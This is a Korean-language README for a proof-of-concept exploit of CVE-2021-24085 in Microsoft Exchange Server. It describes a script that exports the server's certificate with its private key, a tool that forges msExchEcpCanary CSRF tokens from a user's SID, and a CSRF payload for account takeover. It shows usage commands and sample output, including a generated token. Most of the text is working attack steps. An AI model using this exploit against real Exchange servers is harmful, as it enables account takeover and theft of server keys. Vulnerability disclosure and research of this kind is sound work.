
CVE-2021-24085에 대한 개념 증명 익스플로잇: msExchEcpCanary 토큰 위조를 통한 Microsoft Exchange Server의 CSRF 기반 권한 상승으로 계정 탈취 가능
이것은 CVE-2021-24085에 대한 개념 증명입니다.
poc.py는 대상의 인증서 파일을 내부에 개인 키와 함께 다운로드합니다.YellowCanary는 SID를 기반으로 특정 사용자의 msExchEcpCanary CSRF 토큰을 생성합니다.poc.js는 계정 탈취를 유발하는 CSRF 익스플로잇입니다.malicifest.xml 파일을 제공하지는 않았지만, 아래 참고 자료 섹션에서 사용 가능한 리소스를 통해 악성 매니페스트 파일을 생성하는 방법에 대한 정보를 찾을 수 있습니다.
개인 키가 포함된 인증서에 접근:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
이제 대상 사용자의 SID를 사용하여 YellowCanary로 CSRF 토큰을 생성할 수 있습니다:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.